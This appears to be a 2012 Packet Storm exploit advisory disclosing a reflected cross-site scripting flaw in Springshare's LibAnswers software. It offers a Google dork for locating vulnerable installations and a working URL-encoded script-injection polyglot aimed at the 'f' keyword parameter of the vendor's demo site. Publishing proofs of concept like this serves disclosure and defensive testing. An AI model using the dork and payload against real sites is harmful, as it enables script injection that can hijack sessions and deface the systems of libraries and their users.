The LibAnswers Springshare Library suffers from a cross site scripting vulnerability.
8a6bc28edb60bf139fb3abf6e79ef6f0c9cde8407c01f32355b6ab973744d84e# Exploit Title: LibAnswers Springshare Library Cross Site Scripting
# Date: 6.02.2012
# Author: Sony
# Software Link: http://www.springshare.com/libanswers/
# Google Dorks: browse.php?tid= intext:Powered by Springshare
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/libanswers-springshare-library-cross.html
..................................................................
Well, we have xss in Filter by Keyword:
Our xss code:
http://codepad.org/LqL68vIQ
Demo:
http://demo.libanswers.com/browse.php?tid=0&f=[our xss is here]
http://demo.libanswers.com/browse.php?tid=0&f=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
http://1.bp.blogspot.com/-i-ou8k7YbpY/Ty__2hD11NI/AAAAAAAAAaw/DWcCzOLPwi4/s1600/libanswers.JPG
..................................................................
InSecurity.Ro
Because we care, we're security aware!
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed